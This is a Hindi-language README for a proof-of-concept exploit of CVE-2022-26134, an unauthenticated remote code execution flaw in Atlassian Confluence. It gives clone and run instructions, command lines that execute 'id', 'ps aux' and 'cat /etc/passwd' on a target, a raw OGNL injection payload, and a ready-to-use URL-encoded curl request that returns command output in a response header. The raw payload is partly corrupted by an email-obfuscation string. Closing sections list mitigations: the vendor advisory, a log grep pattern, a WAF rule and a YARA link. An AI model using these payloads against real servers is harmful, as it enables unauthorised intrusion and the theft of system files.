
Atlassian Confluence (CVE-2022-26134) - अप्रमाणित OGNL इंजेक्शन भेद्यता (RCE)।
यह एक प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट है जो Atlassian Confluence 7.18 और उससे निचले उत्पादों को प्रभावित करने वाली रिमोट कोड एक्ज़ीक्यूशन भेद्यता का शोषण करती है। OGNL इंजेक्शन भेद्यता एक अनधिकृत उपयोगकर्ता को Confluence Server या Data Center इंस्टेंस पर मनमाना कोड निष्पादित करने की अनुमति देती है।
Confluence Server और Data Center के सभी समर्थित संस्करण प्रभावित हैं।
Confluence Server और Data Center के 1.3.0 के बाद और 7.18.1 से नीचे के संस्करण प्रभावित हैं।
इस भेद्यता का CVSS स्कोर गंभीरता के लिए 10 में से 10 है।
pip install -r requirements.txt
रिपॉजिटरी क्लोन करें:
git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134
फिर आप अपनी पसंद के कमांड के साथ एक्सप्लॉइट को निम्नानुसार चला सकते हैं:
python3 cve-2022-26134.py https://target.com "id"
python3 cve-2022-26134.py https://target.com "ps aux"
python3 cve-2022-26134.py https://target.com "cat /etc/passwd"
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
फिर, कमांड का परिणाम रिस्पॉन्स हेडर में X-Cmd-Response पैरामीटर में प्रतिबिंबित होगा।
Atlassian की आधिकारिक अनुशंसाओं का पालन करें:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
Atlassian ने इस CVE से प्रभावित अपने उत्पादों के लिए एक सलाह जारी की है, जिसे आप यहाँ पढ़ सकते हैं। समस्या को हल करने के लिए, आपको अपने Confluence संस्करण को अपग्रेड करना होगा। प्रकाशन के समय सुझाई गई सूची निम्न है:
Confluence एक Apache Tomcat सर्वर है जिसकी लॉगिंग /opt/atlassian/confluence/logs में स्थित होती है। आप कमांड निष्पादित करने के लिए Java runtime का उपयोग करने वाले पेलोड के HTTP GET अनुरोधों को खोजने के लिए grep जैसे कमांड का उपयोग कर सकते हैं। उदाहरण के लिए:
grep -R "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22" catalina.out में
यह भेद्यता सभी सेल्फ-होस्टेड इंस्टेंस को प्रभावित करती है। यदि आप WAF का उपयोग करते हैं, तो आप अंदर ${ वाले URL को ब्लॉक कर सकते हैं।
YARA (Volexity द्वारा): https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar
केवल शैक्षिक उद्देश्य के लिए।
